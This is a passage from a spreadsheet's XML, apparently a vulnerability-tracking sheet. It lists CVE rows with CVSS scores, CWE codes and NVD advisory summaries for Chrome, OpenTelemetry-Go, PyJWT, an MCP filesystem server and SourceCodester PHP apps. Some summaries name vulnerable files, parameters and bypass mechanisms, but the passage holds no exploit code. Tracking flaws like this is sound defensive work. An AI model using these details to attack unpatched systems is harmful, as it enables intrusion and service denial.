        <v>6.5</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-672</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Use of released resource in Core in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95366</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81872</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-834</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. Prior to version 0.21.0, the go.opentelemetry.io/otel/sdk/log BatchingProcessor can enter a tight CPU loop when attacker-driven log emission fills its asynchronous export buffer while the exporter is backpressured. NewBatchingProcessor wraps the exporter with newBufferExporter(exporter, 1), and the poll loop calls queue.TryDequeue and bufferExporter.EnqueueExport before immediately signaling pollTrigger whenever the queue remains at or above batchSize. Because a failed nonblocking EnqueueExport leaves the queue length unchanged, the processor repeatedly retries without waiting for its ticker, exhausting CPU and degrading or denying service in the embedding process. This issue is fixed in version 0.21.0.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81872</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95375</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in BrowserTag in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95375</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102329</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting in WebUI in Google Chrome prior to 154.0.8037.92 allowed a remote attacker to bypass web origin policy into a privileged page via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102329</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103049</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: before 1.46.1.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103049</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102274</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.9.0 until 2.14.0, PyJWKSet does not catch the plain ValueError raised for malformed RSA JWK components by RSAAlgorithm.from_jwk in  jwt/api_jwk.py. This occurs when a JWK Set contains a malformed RSA key alongside otherwise usable keys. As a result, one malformed member aborts construction of the entire PyJWKSet. Consequently, applications can experience authentication failures or request-level denial of service. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102274</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79534</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>mark3labs mcp-filesystem-server v0.11.1 is vulnerable to Directory Traversal due to an improper link resolution in validatePath (filesystemserver/handler/helper.go). When filepath.EvalSymlinks returns os.IsNotExist for a dangling symlink, the fallback validates only the parent directory and returns the unresolved path, so write_file (and modify_file, copy_file, move_file, create_directory) follows a pre-existing dangling symlink located inside an allowed directory and creates a file outside the configured allowed directories.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79534</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102845</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. This issue affects the function error_reporting of the file index.php of the component HTTP Response. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102845</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102908</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Online Reviewer Management System 1.0. This issue affects some unknown processing of the file /reviewer_0/admins/assessments/examproper/questions-view.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102908</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102909</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Online Reviewer Management System 1.0. Impacted is an unknown function of the file /reviewer_0/admins/assessments/examproper/btn_functions.php. The manipulation of the argument access_code leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102909</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95287</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K351" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Navigation in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95287</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95290</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in NFC in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95290</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95352</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95352</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95370</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>Inappropriate implementation in NFC in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95370</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101917</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>python, requests</t>
        </is>
      </c>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT get_signing_key_from_jwt is affected because unknown kid misses force refreshes without a negative cache or minimum refresh interval. This occurs when unauthenticated tokens repeatedly use the same unknown kid or varying kid values absent from the cached JWKS. As a result, each cache miss causes PyJWKClient to refresh the JWKS. Consequently, attacker traffic can amplify outbound requests to the configured JWKS endpoint. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101917</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102265</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
